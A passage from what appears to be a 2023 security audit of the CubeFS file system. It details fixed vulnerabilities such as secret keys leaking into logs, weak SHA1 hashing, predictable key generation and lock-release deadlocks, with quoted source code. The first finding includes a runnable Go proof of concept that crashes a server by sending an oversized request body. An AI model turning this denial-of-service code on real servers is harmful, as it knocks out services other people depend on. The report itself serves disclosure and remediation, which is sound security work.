CubeFS\nconsumers should not be discouraged from a low level of compliance. We recommend that the\nCubeFS community tracks ongoing work for adopting the slsa-github-generator project and\nworking on this in the open. It is far from all open-source projects that have achieved level 3\ncompliance at this part of SLSA open-source lifetime.\nCubeFS currently is at Level 0 by the SLSA specification.\nCubeFS 2023 Security Audit\n11\nAda Logics LtdIssues found\nAda Logics found 12 issues during the audit. The list includes all issues found by way of manual\nauditing and fuzzing. Ada Logics uses a scoring system that considers impact and ease of\nexploitation. This is di\u0000 erent from the CVSS scoring system, and there may be discrepancies\nbetween the severity assigned by Ada Logics and the severity resulting from a CVSS calculation.\n# Title Status Severity\n1Authenticated users can crash the CubeFS servers with\nmaliciously cra\u0000 ed requestsFixed Moderate\n2CubeFS leaks magic secret key when starting Blobstore\naccess serviceFixed Moderate\n3 CubeFS leaks users key in logs Fixed Moderate\n4 Insecure cryptographic primitive used for sensitive data Fixed Moderate\n5 Insecure random string generator used for sensitive data Fixed Moderate\n6 Lack of security-best-practices documentation Fixed Moderate\n7 Possible deadlocks Fixed Moderate\n8 Possible nil-dereference from unmarshalling double pointer Fixed Low\n9 Potential Slowloris attacks Fixed Low\n10 Releases are not signed Fixed Moderate\n11 Security Disclosure Email Does Not Work Fixed Low\n12 Timing attack can leak user passwords Fixed Moderate\nCubeFS 2023 Security Audit\n12\nAda Logics LtdAuthenticated users can crash the CubeFS servers with\nmaliciously cra \u0000ed requests\nSeverity: Moderate\nStatus: Fixed\nId: ADA-CUBEFS-NKbh4NJK\nComponent: ObjectNode\nThe root cause is that when CubeFS reads the body of incoming requests, it reads it entirely into\nmemory and without an upper boundary. As such, an attacker can cra\u0000 an HTTP that contains a\nlarge body and exhausts memory of the machine, which results in crashing the server.\nDetails\nThe issue exists across multiple CubeFS components. We have not made an exhaustive list and\nwill follow up with that. For now, we exemplify the issue with the deleteObjectsHandler of the\nobjectnode component. This handler reads the body of the incoming request entirely into\nmemory on line 561 below:\nhttps://github.com/cubefs/cubefs/blob/45442918591d25e7ab555469df384df468df5dbc/objectnode/api_handler_object.go#L5\n32C22-L567\n532func (o *ObjectNode) deleteObjectsHandler (w http.ResponseWriter, r *http.Request) {\n533 var (\n534 err error\n535 errorCode *ErrorCode\n536 )\n537 defer func() {\n538 o.errorResponse (w, r, err, errorCode)\n539 }()\n540\n541 var param = ParseRequestParam (r)\n542 if param.Bucket() == \"\" {\n543 errorCode = InvalidBucketName\n544 return\n545 }\n546\n547 var vol *Volume\n548 if vol, err = o. getVol(param.Bucket()); err != nil {\n549 log.LogErrorf (\"deleteObjectsHandler: load volume fail: requestID(%v) \nvolume(%v) err(%v)\" ,\n550 GetRequestID (r), param. Bucket(), err)\n551 return\n552 }\n553\n554 requestMD5 := r.Header. Get(ContentMD5)\n555 if requestMD5 == \"\" {\n556 errorCode = MissingContentMD5\n557 return\n558 }\n559\n560 var bytes [] byte\n561 bytes, err = ioutil. ReadAll(r.Body)\n562 if err != nil {\n563 log.LogErrorf (\"deleteObjectsHandler: read request body fail: \nrequestID(%v) volume(%v) err(%v)\" ,\n564 GetRequestID (r), param. Bucket(), err)\n565 errorCode = UnexpectedContent\n566 return\n567 }\nIn this case, a user does not require permission to delete objects since the ACL check is done\na\u0000er reading the request body.\nPoC\nCubeFS 2023 Security Audit\n13\nAda Logics LtdWe include two programs to reproduce this issue. Warning: save all work before running this\nPoC, including work in browser tabs.\nThe first program is a server that represents the deleteObjectsHandler . We have stripped\nunrelated parts of the function body that the HTTP request can easily pass legitimately. Start up\nthis server by creating the following go module and run it with go run main.go :\n1package main\n2\n3import (\n4 \"fmt\"\n5 \"io/ioutil\"\n6 \"net/http\"\n7)\n8\n9func main() {\n10 http.HandleFunc (\"/deleteObjects\" , func(w http.ResponseWriter, r \n*http.Request) {\n11 // Here CubeFS gets the params. We skip that since an authenticated \nuser can get past that.\n12\n13 // Here CubeFS gets the volume. The user can pass a Bucket identifier \nthat will not return an error to get past that.\n14\n15 // Here CubeFS gets the requestMD5. The user can include any value in \nthe header to get past that.\n16\n17 // At this point, the handler invokes the vulnerable line\n18 fmt.Println(\"Got request\" )\n19 _, err := ioutil. ReadAll(r.Body)\n20 if err != nil {\n21 return\n22 }\n23 fmt.Println(\"Finished reading body\" )\n24 })\n25\n26 fmt.Printf(\"Starting server at port 8080\\n\" )\n27 if err := http. ListenAndServe (\":8080\", nil); err != nil {\n28 panic(err)\n29 }\n30}\nYou should see Starting server at port 8080 in the terminal when starting this program.\nThe next program is the client. This program represents the malicious user who cra \u0000s a request\nwith a large body and sends it to the server. Depending on the system used when running this\nprogram, it may be necessary to reduce or increase the size of the body. Create the followingmain.go in another module and run it with go run main.go\n1package main\n2\n3import (\n4 \"io\"\n5 \"strings\"\n6 \"net/http\"\n7)\n8\n9func main() {\n10 req := maliciousRequest ()\n11 \n12 _, err := http.DefaultClient. Do(req)\n13 if err != nil{\n14 panic(err)\n15 }\n16}\n17\n18func maliciousRequest () *http.Request {\n19 s := strings. Repeat(\"malicious string\" , 100000000)\n20 r1 := strings. NewReader (s)\n21 r2 := strings. NewReader (s)\n22 r3 := strings. NewReader (s)\n23 r4 := strings. NewReader (s)\n24 r5 := strings. NewReader (s)\n25 r6 := strings. NewReader (s)\n26 r7 := strings. NewReader (s)\n27 r8 := strings. NewReader (s)\n28 r := io. MultiReader (r1, r2, r3, r4, r5, r6, r7, r8)\nCubeFS 2023 Security Audit\n14\nAda Logics Ltd29 req, err := http. NewRequest (\"POST\", \"http://localhost:8080/deleteObjects\" , r)\n30 if err != nil {\n31 panic(err)\n32 }\n33 return req\n34}\nThis request should exhaust memory temporarily and then crash the server.\nImpact\nAll CubeFS users are impacted by this issue.\nCubeFS 2023 Security Audit\n15\nAda Logics LtdCubeFS leaks magic secret key when starting Blobstore\naccess service\nSeverity: Moderate\nStatus: Fixed\nId: ADA-CUBEFS-MNJHBrv3\nComponent: BlobStore\nCubeFS leaks secret configuration keys during initialization of the blobstore access service\ncontroller, more specifically here:\nhttps://github.com/cubefs/cubefs/blob/26da9925a3db98\u00009a1e9a12cca2c457f736b831/blobstore/access/server.go#L76-L86\n76func initWithRegionMagic (regionMagic string) {\n77 if regionMagic == \"\" {\n78 log.Warn(\"no region magic setting, using default secret keys for \nchecksum\" )\n79 return\n80 }\n81\n82 log.Info(\"using magic secret keys for checksum with:\" , regionMagic)\n83 b := sha1. Sum([]byte(regionMagic))\n84 initTokenSecret (b[:8])\n85 initLocationSecret (b[:8])\n86}\nUsers with access to the logs can retrieve the secret key and escalate privileges to carry out\noperations on blobs that they otherwise don ʼt have the necessary permissions for. For example,\na threat actor who has successfully retrieved a magic secret key from the logs can delete blobs\nfrom the blob store by validating their requests in this step:\nhttps://github.com/cubefs/cubefs/blob/26da9925a3db98\u00009a1e9a12cca2c457f736b831/blobstore/access/server.go#L546-L569\n546func (s *Service) DeleteBlob (c *rpc.Context) {\n547 args := new(access.DeleteBlobArgs)\n548 if err := c. ParseArgs (args); err != nil {\n549 c.RespondError (err)\n550 return\n551 }\n552\n553 ctx := c.Request. Context()\n554 span := trace. SpanFromContextSafe (ctx)\n555\n556 span.Debugf(\"accept /deleteblob request args:%+v\" , args)\n557 if !args.IsValid() {\n558 c.RespondError (errcode.ErrIllegalArguments)\n559 return\n560 }\n561\n562 valid := false\n563 for _, secretKey := range tokenSecretKeys {\n564 token := uptoken. DecodeToken (args.Token)\n565 if token.IsValid(args.ClusterID, args.Vid, args.BlobID, \nuint32(args.Size), secretKey[:]) {\n566 valid = true\n567 break\n568 }\n569 }\nTo exploit this security issue, the attacker needs to have privileges to read the logs. They could\nhave obtained these privileges legitimately, or they could have obtained them by already\nhaving escalated privileges.\nCubeFS 2023 Security Audit\n16\nAda Logics LtdCubeFS leaks users key in logs\nSeverity: Moderate\nStatus: Fixed\nId: ADA-CUBEFS-vc34CGVVJB\nComponent: Master\nCubeFS leaks secret user keys and access keys in the logs in multiple components. When\nCubeCS creates new users, it leaks the user's secret key. This could allow a lower-privileged user\nwith access to the logs to retrieve sensitive information and impersonate other users with\nhigher privileges than themselves.Details\nThe vulnerable API that leaks secret keys is createKey :\nhttps://github.com/cubefs/cubefs/blob/26da9925a3db98\u00009a1e9a12cca2c457f736b831/master/user.go#L43-L111\n43func (u *User) createKey (param *proto.UserCreateParam) (userInfo *proto.UserInfo, err \nerror) {\n44 var (\n45 AKUser *proto.AKUser\n46 userPolicy *proto.UserPolicy\n47 exist bool\n48 )\n49 if param.ID == \"\" {\n50 err = proto.ErrInvalidUserID\n51 return\n52 }\n53 if !param.Type. Valid() {\n54 err = proto.ErrInvalidUserType\n55 return\n56 }\n57\n58 var userID = param.ID\n59 var password = param.Password\n60 if password == \"\" {\n61 password = DefaultUserPassword\n62 }\n63 var accessKey = param.AccessKey\n64 if accessKey == \"\" {\n65 accessKey = util. RandomString (accessKeyLength, \nutil.Numeric|util.LowerLetter|util.UpperLetter)\n66 } else {\n67 if !proto. IsValidAK (accessKey) {\n68 err = proto.ErrInvalidAccessKey\n69 return\n70 }\n71 }\n72 var secretKey = param.SecretKey\n73 if secretKey == \"\" {\n74 secretKey = util. RandomString (secretKeyLength, \nutil.Numeric|util.LowerLetter|util.UpperLetter)\n75 } else {\n76 if !proto. IsValidSK (secretKey) {\n77 err = proto.ErrInvalidSecretKey\n78 return\n79 }\n80 }\n81 var userType = param.Type\n82 var description = param.Description\n83 u.userStoreMutex. Lock()\n84 defer u.userStoreMutex. Unlock()\n85 u.AKStoreMutex. Lock()\n86 defer u.AKStoreMutex. Unlock()\n87 //check duplicate\n88 if _, exist = u.userStore. Load(userID); exist {\n89 err = proto.ErrDuplicateUserID\n90 return\n91 }\n92 _, exist = u.AKStore. Load(accessKey)\n93 for exist {\nCubeFS 2023 Security Audit\n17\nAda Logics Ltd94 accessKey = util. RandomString (accessKeyLength, \nutil.Numeric|util.LowerLetter|util.UpperLetter)\n95 _, exist = u.AKStore. Load(accessKey)\n96 }\n97 userPolicy = proto. NewUserPolicy ()\n98 userInfo = &proto.UserInfo{UserID: userID, AccessKey: accessKey, SecretKey: \nsecretKey, Policy: userPolicy,\n99 UserType: userType, CreateTime: time. Unix(time.Now().Unix(), \n0).Format(proto.TimeFormat), Description: description}\n100 AKUser = &proto.AKUser{AccessKey: accessKey, UserID: userID, Password: \nencodingPassword (password)}\n101 if err = u. syncAddUserInfo (userInfo); err != nil {\n102 return\n103 }\n104 if err = u. syncAddAKUser (AKUser); err != nil {\n105 return\n106 }\n107 u.userStore. Store(userID, userInfo)\n108 u.AKStore. Store(accessKey, AKUser)\n109 log.LogInfof (\"action[createUser], userID: %v, accesskey[%v], secretkey[%v]\" , \nuserID, accessKey, secretKey)\n110 return\n111}\ncreateKey creates a UserInfo , an access key and a secret key and stores it in the respective\nstores. If createKey successfully creates all three pieces of information and successfully stores\nthem, it will log the created pieces of information on this line:\nhttps://github.com/cubefs/cubefs/blob/26da9925a3db98\u00009a1e9a12cca2c457f736b831/master/user.go#L109\n109 log.LogInfof (\"action[createUser], userID: %v, accesskey[%v], secretkey[%v]\" , \nuserID, accessKey, secretKey)\nImpact\nAn attacker who has access to the logs can see the secret key in plain text and impersonate the\nuser. The attacker can either be an internal user with limited privileges to read the log, or it canbe an external user who has escalated privileges su\u0000iciently to access the logs.\nTo find the places where CubeFS logs the users accessKey , we refer to the following grep call:\ngrep -r \"log\\.\" . --exclude=*test.go | grep accessKey . Not all occurrences of this constitute a\nvulnerability: Only cases of logging a\u0000 er authorization represent a security issue.\nCubeFS 2023 Security Audit\n18\nAda Logics LtdInsecure cryptographic primitive used for sensitive data\nSeverity: Moderate\nStatus: Fixed\nId: ADA-CUBEFS-VGvgh234hb2\nComponent: Master\nCubefs Master uses an insecure cryptographic primitive for encoding user passwords. Cubefs\nuses SHA1 to encode the password. Researchers have identified theoretical collision attacks of\nSHA1 for the first time in 2004 but have only demonstrated it in practice in 2017 (Marc Stevens,\nElie Bursztein, Pierre Karpman, Ange Albertini, and Yarik Markov. \"The first collision for full SHA-\n1\"). NIST recommends that existing usage of SHA1 for security-sensitve information should be\nupgraded to SHA2 or SHA3 (https://www.nist.gov/news-events/news/2022/12/nist-retires-sha-\n1-cryptographic-algorithm). The issue exists in the encodingPassword helper:\nhttps://github.com/cubefs/cubefs/blob/45442918591d25e7ab555469df384df468df5dbc/master/user.go#L547-L551\n547func encodingPassword (s string) string {\n548 t := sha1. New()\n549 io.WriteString (t, s)\n550 return hex.EncodeToString (t.Sum(nil))\n551}\nCubefs uses this helper when creating a user below on line 100:\nhttps://github.com/cubefs/cubefs/blob/45442918591d25e7ab555469df384df468df5dbc/master/user.go#L43-L111\n43func (u *User) createKey (param *proto.UserCreateParam) (userInfo *proto.UserInfo, err \nerror) {\n44 var (\n45 AKUser *proto.AKUser\n46 userPolicy *proto.UserPolicy\n47 exist bool\n48 )\n49 if param.ID == \"\" {\n50 err = proto.ErrInvalidUserID\n51 return\n52 }\n53 if !param.Type. Valid() {\n54 err = proto.ErrInvalidUserType\n55 return\n56 }\n57\n58 var userID = param.ID\n59 var password = param.Password\n60 if password == \"\" {\n61 password = DefaultUserPassword\n62 }\n63 var accessKey = param.AccessKey\n64 if accessKey == \"\" {\n65 accessKey = util. RandomString (accessKeyLength, \nutil.Numeric|util.LowerLetter|util.UpperLetter)\n66 } else {\n67 if !proto. IsValidAK (accessKey) {\n68 err = proto.ErrInvalidAccessKey\n69 return\n70 }\n71 }\n72 var secretKey = param.SecretKey\n73 if secretKey == \"\" {\n74 secretKey = util. RandomString (secretKeyLength, \nutil.Numeric|util.LowerLetter|util.UpperLetter)\n75 } else {\n76 if !proto. IsValidSK (secretKey) {\n77 err = proto.ErrInvalidSecretKey\n78 return\n79 }\n80 }\nCubeFS 2023 Security Audit\n19\nAda Logics Ltd81 var userType = param.Type\n82 var description = param.Description\n83 u.userStoreMutex. Lock()\n84 defer u.userStoreMutex. Unlock()\n85 u.AKStoreMutex. Lock()\n86 defer u.AKStoreMutex. Unlock()\n87 //check duplicate\n88 if _, exist = u.userStore. Load(userID); exist {\n89 err = proto.ErrDuplicateUserID\n90 return\n91 }\n92 _, exist = u.AKStore. Load(accessKey)\n93 for exist {\n94 accessKey = util. RandomString (accessKeyLength, \nutil.Numeric|util.LowerLetter|util.UpperLetter)\n95 _, exist = u.AKStore. Load(accessKey)\n96 }\n97 userPolicy = proto. NewUserPolicy ()\n98 userInfo = &proto.UserInfo{UserID: userID, AccessKey: accessKey, SecretKey: \nsecretKey, Policy: userPolicy,\n99 UserType: userType, CreateTime: time. Unix(time.Now().Unix(), \n0).Format(proto.TimeFormat), Description: description}\n100 AKUser = &proto.AKUser{AccessKey: accessKey, UserID: userID, Password: \nencodingPassword (password)}\n101 if err = u. syncAddUserInfo (userInfo); err != nil {\n102 return\n103 }\n104 if err = u. syncAddAKUser (AKUser); err != nil {\n105 return\n106 }\n107 u.userStore. Store(userID, userInfo)\n108 u.AKStore. Store(accessKey, AKUser)\n109 log.LogInfof (\"action[createUser], userID: %v, accesskey[%v], secretkey[%v]\" , \nuserID, accessKey, secretKey)\n110 return\n111}\nAn attacker who can retrieve the database records of users has a lower barrier for getting the\nactual passwords of users than if Cubefs used a secure primitive such as SHA2 or SHA3. To\nexploit this weakness, an attacker would already need to escalate privileges or gain access to\ndatabase records from misconfiguration of a Cubefs deployment. Even so, an attacker has the\npotential for further escalating privileges by exploiting this weakness depending on the user\ncredentials they can steal.Mitigation\nWe recommend using a secure primitive for user passwords. This would mitigate risk even if an\nattacker has access to the encrypted user passwords.\nCubeFS 2023 Security Audit\n20\nAda Logics LtdInsecure random string generator used for sensitive data\nSeverity: Moderate\nStatus: Fixed\nId: ADA-CUBEFS-BH£Rj2432jk\nComponent: Master\nCubeFS uses an insecure random string generator to generate user-specific, sensitive keys used\nto authenticate users in a CubeFS deployment. This could allow an attacker to predict and/or\nguess the generated string and impersonate a user, thereby obtaining higher privileges.\nWhen CubeFS creates new users, it creates a piece of sensitive information for the user called\nthe “accessKey” . To create the accesKey , CubeFS uses an insecure string generator which makes\nit easy to guess and thereby impersonate the created user. The API that generates access keys is\nRandomString :\nhttps://github.com/cubefs/cubefs/blob/26da9925a3db98\u00009a1e9a12cca2c457f736b831/util/string.go#L58-L67\n58func RandomString (length int, seed RandomSeed) string {\n59 runs := seed. Runes()\n60 result := \"\"\n61 for i := 0; i < length; i++ {\n62 rand.Seed(time.Now().UnixNano ())\n63 randNumber := rand. Intn(len(runs))\n64 result += string(runs[randNumber])\n65 }\n66 return result\n67}\nRandomString uses math/rand seeded with UnixNano() to generate the string, which is\npredictable. math/rand is not suited for sensitive information, as stated in the documentation:\nhttps://pkg.go.dev/math/rand#pkg-overview.\nCubeFS uses RandomString() to generate user access keys in the following places:\nhttps://github.com/cubefs/cubefs/blob/26da9925a3db98\u00009a1e9a12cca2c457f736b831/master/user.go#L63-L66\n63 var accessKey = param.AccessKey\n64 if accessKey == \"\" {\n65 accessKey = util. RandomString (accessKeyLength, \nutil.Numeric|util.LowerLetter|util.UpperLetter)\n66 } else {\nhttps://github.com/cubefs/cubefs/blob/26da9925a3db98\u00009a1e9a12cca2c457f736b831/master/user.go#L92-L96\n92 _, exist = u.AKStore. Load(accessKey)\n93 for exist {\n94 accessKey = util. RandomString (accessKeyLength, \nutil.Numeric|util.LowerLetter|util.UpperLetter)\n95 _, exist = u.AKStore. Load(accessKey)\n96 }\nhttps://github.com/cubefs/cubefs/blob/26da9925a3db98\u00009a1e9a12cca2c457f736b831/master/user.go#L72-L75\n72 var secretKey = param.SecretKey\n73 if secretKey == \"\" {\n74 secretKey = util. RandomString (secretKeyLength, \nutil.Numeric|util.LowerLetter|util.UpperLetter)\n75 } else {\nCubeFS 2023 Security Audit\n21\nAda Logics LtdImpact\nAn attacker could exploit the predictable random string generator and guess a users access key\nto impersonate the user and obtain higher privileges.\nCubeFS 2023 Security Audit\n22\nAda Logics LtdLack of security-best-practices documentation\nSeverity: Moderate\nStatus: Fixed\nId: ADA-CUBEFS-vc34CGVVJB\nComponent: CubeFS\nCubeFS maintain documentation on how to easily get started with CubeFS, which is positive;\nhowever, CubeFS lacks a section or dedicated page on deploying and using CubeFS in a secure,\nproduction-ready manner.\nWe recommend setting up a dedicated page to accommodate this. See the Istio security-best-\npractices page for reference: https://istio.io/latest/docs/ops/best-practices/security/.\nWithout an o\u0000icially maintained security-best-practices page, users may deploy CubeFS in ways\nthat are known by the community to be insecure and obviously necessary for secure but also\neasy to overlook. Users should not be expected to read through the entire documentation to\ndissect the critical parts for deployment. Instead, we recommend a dedicated page for this\npurpose.\nThe work to maintain secure-best-practices documentation should be considered an ongoing\nprocess. Adding this to the documentation, maintaining it and developing it over time is good\npractice.\nCubeFS 2023 Security Audit\n23\nAda Logics LtdPossible deadlocks\nSeverity: Moderate\nStatus: Fixed\nId: ADA-CUBEFS-LK432hu\nComponent: Multiple\nCubefs is susceptible to a number of deadlocks across multiple components. This is an\numbrella issue for all identified possible deadlocks. Deadlocks happen when two threads or\nprograms are waiting for each other to finish, where one of them does not finish. This has\nsecurity implications if an attacker is able to cause the deadlock. The attacker will steer the\nexecution of the program into a path where the program invokes a lock but does not unlock it.\nBelow we enumerate the places across the Cubefs source tree where this can happen.Rate limiter\nBelow, Cubefs locks the mutex on line 60 and unlocks it on line 72. Between the mutex lock and\nunlock, the method can exit in two places: line 63 and line 67.\nhttps://github.com/cubefs/cubefs/blob/46cb4d149c45f1ad7b40381b5a2a20bd6d599e25/util/ratelimit/keyratelimit.go#L58-L73\n58func (k *KeyRateLimit) Release(key string) {\n59\n60 k.mutex. Lock()\n61 limit, ok := k.current[key]\n62 if !ok {\n63 panic(\"key not in map. Possible reason: Release without Acquire.\" )\n64 }\n65 limit.refCount--\n66 if limit.refCount < 0 {\n67 panic(\"internal error: refs < 0\" )\n68 }\n69 if limit.refCount == 0 {\n70 delete(k.current, key)\n71 }\n72 k.mutex. Unlock()\n73}\nflowctrl\nA similar case to the Rate limiter exists in the flowctrl package:\nhttps://github.com/cubefs/cubefs/blob/46cb4d149c45f1ad7b40381b5a2a20bd6d599e25/util/flowctrl/keycontroller.go#L55-L71\n55func (k *KeyFlowCtrl) Release(key string) {\n56\n57 k.mutex. Lock()\n58 ctrl, ok := k.current[key]\n59 if !ok {\n60 panic(\"key not in map. Possible reason: Release without Acquire.\" )\n61 }\n62 ctrl.refCount--\n63 if ctrl.refCount < 0 {\n64 panic(\"internal error: refs < 0\" )\n65 }\n66 if ctrl.refCount == 0 {\n67 ctrl.c.Close() // avoid goroutine leak\n68 delete(k.current, key)\n69 }\n70 k.mutex. Unlock()\n71}\nCubefs locks the mutex on line 57 and unlocks it on line 70. The method can exit on lines 60 and\n64 without unlocking.\nCubeFS 2023 Security Audit\n24\nAda Logics LtdMetanode\nMetanodes method for marshalling a value to bytes has a potential deadlock if the call to\nbinary.Write fails with an error, which will cause the method to panic without releasing the\nlock.\nBelow, MarshalValue() locks on line 703 and unlocks on line 719. On line 709, the method\npanics without releasing the lock:\nhttps://github.com/cubefs/cubefs/blob/46cb4d149c45f1ad7b40381b5a2a20bd6d599e25/metanode/inode.go#L698-L721\n698func (i *Inode) MarshalValue () (val [] byte) {\n699 var err error\n700 buff := bytes. NewBuffer (make([] byte, 0, 128))\n701 buff.Grow(64)\n702\n703 i.RLock()\n704 i.MarshalInodeValue (buff)\n705 if i.getLayerLen () > 0 && i. getVer() == 0 {\n706 log.LogFatalf (\"action[MarshalValue] inode %v current verseq %v, hist \nlen (%v) stack(%v)\" , i.Inode, i. getVer(), i.getLayerLen (), string(debug. Stack()))\n707 }\n708 if err = binary. Write(buff, binary.BigEndian, int32(i. getLayerLen ())); err \n!= nil {\n709 panic(err)\n710 }\n711\n712 if i.multiSnap != nil {\n713 for _, ino := range i.multiSnap.multiVersions {\n714 ino.MarshalInodeValue (buff)\n715 }\n716 }\n717\n718 val = buff. Bytes()\n719 i.RUnlock()\n720 return\n721}\nAn attacker who can trigger the panic in a controlled manner has the potential to exploit this by\nlocking a lot or all resources on the machine and thereby cause denial of service.\nQosCtrlManager\nThe Cubefs QoS manager's method for assigning QoS to clients, assignClientsNewQos is\nsusceptible to a deadlock in case the manager has not enabled QoS. Below, the manager locks\non line 692 and unlocks on line 722. On line 694, the manager will return if the QoS is not\nenabled:\nhttps://github.com/cubefs/cubefs/blob/46cb4d149c45f1ad7b40381b5a2a20bd6d599e25/master/limiter.go#L691-L735\n691func (qosManager *QosCtrlManager) assignClientsNewQos (factorType uint32) {\n692 qosManager. RLock()\n693 if !qosManager.qosEnable {\n694 return\n695 }\n696 serverLimit := qosManager.serverFactorLimitMap[factorType]\n697 var bufferAllocated uint64\n698\n699 // recalculate client Assign limit and buffer\n700 for _, cliInfoMgr := range qosManager.cliInfoMgrMap {\n701 cliInfo := cliInfoMgr.Cli.FactorMap[factorType]\n702 assignInfo := cliInfoMgr.Assign.FactorMap[factorType]\n703\n704 if cliInfo.Used+cliInfoMgr.Cli.FactorMap[factorType].Need == 0 {\n705 assignInfo.UsedLimit = 0\n706 assignInfo.UsedBuffer = 0\n707 } else {\n708 assignInfo.UsedLimit = \nuint64(float64(cliInfo.Used+cliInfo.Need) * float64(1-serverLimit.LimitRate))\n709 if serverLimit.Allocated != 0 {\n710 assignInfo.UsedBuffer = \nuint64(float64(serverLimit.Buffer) * (float64(assignInfo.UsedLimit) / \nfloat64(serverLimit.Allocated)) * 0.5)\n711 }\n712\nCubeFS 2023 Security Audit\n25\nAda Logics Ltd713 // buffer left may be quit large and we should not use up \nand doesn't mean if buffer large than used limit line\n714 if assignInfo.UsedBuffer > assignInfo.UsedLimit {\n715 assignInfo.UsedBuffer = assignInfo.UsedLimit\n716 }\n717 }\n718\n719 bufferAllocated += assignInfo.UsedBuffer\n720 }\n721\n722 qosManager. RUnlock()\n723\n724 if serverLimit.Buffer > bufferAllocated {\n725 serverLimit.Buffer -= bufferAllocated\n726 } else {\n727 serverLimit.Buffer = 0\n728 log.LogWarnf (\"action[assignClientsNewQos] vol [%v] type [%v] clients \nbuffer [%v] and server buffer used up trigger flow limit overall\" ,\n729 qosManager.vol.Name, proto. QosTypeString (factorType), \nbufferAllocated)\n730 }\n731\n732 log.QosWriteDebugf (\"action[assignClientsNewQos] vol [%v] type [%v] \nserverLimit buffer:[%v] used:[%v] need:[%v] total:[%v]\" ,\n733 qosManager.vol.Name, proto. QosTypeString (factorType),\n734 serverLimit.Buffer, serverLimit.Allocated, \nserverLimit.NeedAfterAlloc, serverLimit.Total)\n735}\nAn attacker cannot control whether Cubefs should proceed into this branch and return:\n1 if !qosManager.qosEnable {\n2 return\n3 }\nFor an attacker to return on line 694 and thereby prevent Cubefs from unlocking the manager,\nthey would need to know that the victims Cubefs deployment has disabled QoS and thereby\ncause Cubefs to invoke assignClientsNewQos .\nBlock cache\nThe Block cache manager has a method for removing item keys from the cache to free up\nspace, freeSpace . This method invokes a loop that ends when a counter, cnt reaches 500000 .\nEach loop iteration performs the following steps: 1) The Block cache manager locks, 2) an item\nis deleted from the store, 3) the Block cache manager unlocks. This process is susceptible to a\ndeadlock because the freeSpace method can exist between step 1 and 3, i.e. it is possible for\nfreeSpace to lock the Block cache manager and return without unlocking it.\nOn line 390 the manager enters the for loop. Inside the loop, the manager locks on line 399 and\nunlocks on line 415. On line 403, freeSpace can return without unlocking the manager.\nhttps://github.com/cubefs/cubefs/blob/46cb4d149c45f1ad7b40381b5a2a20bd6d599e25/blockcache/bcache/manage.go#L379-\nL419\n379func (bm *bcacheManager) freeSpace (store *DiskStore, free float32, files int64) {\n380 var decreaseSpace int64\n381 var decreaseCnt int\n382\n383 if free < store.freeLimit {\n384 decreaseSpace = int64((store.freeLimit - free) * \n(float32(store.capacity)))\n385 }\n386 if files > int64(store.limit) {\n387 decreaseCnt = int(files - int64(store.limit))\n388 }\n389\n390 cnt := 0\n391 for {\n392 if decreaseCnt <= 0 && decreaseSpace <= 0 {\n393 break\n394 }\n395 //avoid dead loop\n396 if cnt > 500000 {\n397 break\n398 }\nCubeFS 2023 Security Audit\n26\nAda Logics Ltd399 bm.Lock()\n400\n401 element := bm.lrulist. Front()\n402 if element == nil {\n403 return\n404 }\n405 item := element.Value.(*cacheItem)\n406\n407 if err := store. remove(item.key); err == nil {\n408 bm.lrulist. Remove(element)\n409 delete(bm.bcacheKeys, item.key)\n410 decreaseSpace -= int64(item.size)\n411 decreaseCnt--\n412 cnt++\n413 }\n414\n415 bm.Unlock()\n416 log.LogDebugf (\"remove %v from cache\" , item.key)\n417\n418 }\n419}\nVolume manager\nWhen Cubefs's Volume Manager applies an update to a volume unit, it does so with\napplyAdminUpdateVolumeUnit . applyAdminUpdateVolumeUnit gets the disk info with a call to the disk\nmanagers GetDiskInfo . If this call fails, applyAdminUpdateVolumeUnit returns the error. Before\ngetting the disk info, applyAdminUpdateVolumeUnit puts a lock on the volume that is being\nmodified, and applyAdminUpdateVolumeUnit will not release that lock if the call to GetDiskInfo\nfails. In other words, if the call to GetDiskInfo fails, the lock will not be released. The parameter\nto GetDiskInfo is passed directly from a parameter to applyAdminUpdateVolumeUnit .\napplyAdminUpdateVolumeUnit locks the volume on line 691 and unlocks it again on line 710. On\nline 701, applyAdminUpdateVolumeUnit returns without unlocking the volume.\nhttps://github.com/cubefs/cubefs/blob/46cb4d149c45f1ad7b40381b5a2a20bd6d599e25/blobstore/clustermgr/volumemgr/vol\numemgr.go#L675-L711\n675func (v *VolumeMgr) applyAdminUpdateVolumeUnit (ctx context.Context, unitInfo \n*cm.AdminUpdateUnitArgs) error {\n676 span := trace. SpanFromContextSafe (ctx)\n677 vol := v.all. getVol(unitInfo.Vuid. Vid())\n678 if vol == nil {\n679 span.Errorf(\"apply admin update volume unit,vid %d not exist\" , \nunitInfo.Vuid. Vid())\n680 return ErrVolumeNotExist\n681 }\n682 index := unitInfo.Vuid. Index()\n683 vol.lock. RLock()\n684 if int(index) >= len(vol.vUnits) {\n685 span.Errorf(\"apply admin update volume unit,index:%d over vuids \nlength \" , index)\n686 vol.lock. RUnlock()\n687 return ErrVolumeUnitNotExist\n688 }\n689 vol.lock. RUnlock()\n690\n691 vol.lock. Lock()\n692 if proto.IsValidEpoch (unitInfo.Epoch) {\n693 vol.vUnits[index].epoch = unitInfo.Epoch\n694 vol.vUnits[index].vuInfo.Vuid = \nproto.EncodeVuid (vol.vUnits[index].vuidPrefix, unitInfo.Epoch)\n695 }\n696 if proto.IsValidEpoch (unitInfo.NextEpoch) {\n697 vol.vUnits[index].nextEpoch = unitInfo.NextEpoch\n698 }\n699 diskInfo, err := v.diskMgr. GetDiskInfo (ctx, unitInfo.DiskID)\n700 if err != nil {\n701 return err\n702 }\n703 vol.vUnits[index].vuInfo.DiskID = diskInfo.DiskID\n704 vol.vUnits[index].vuInfo.Host = diskInfo.Host\n705 vol.vUnits[index].vuInfo.Compacting = unitInfo.Compacting\n706\n707 unitRecord := vol.vUnits[index]. ToVolumeUnitRecord ()\n708 err = v.volumeTbl. PutVolumeUnit (unitInfo.Vuid. VuidPrefix(), unitRecord)\n709 vol.lock. Unlock()\n710 return err\nCubeFS 2023 Security Audit\n27\nAda Logics Ltd711}\nThis deadlock can be triggered in two ways. One way is to pass a parameter to\napplyAdminUpdateVolumeUnit , which the user knows will result in returning on line 701. The\nsecond way is to modify the disk manager such that when another user invokes GetDiskInfo()\non line 699, it will fail. GetDiskInfo returns an error if the diskInfo of the passed DiskID does\nnot exist:\nhttps://github.com/cubefs/cubefs/blob/5ab518b3598ee99a74b333d0d2abc80739bbae4d/blobstore/clustermgr/diskmgr/diskm\ngr.go#L274-L285\n274func (d *DiskMgr) GetDiskInfo (ctx context.Context, id proto.DiskID) \n(*blobnode.DiskInfo, error) {\n275 diskInfo, ok := d. 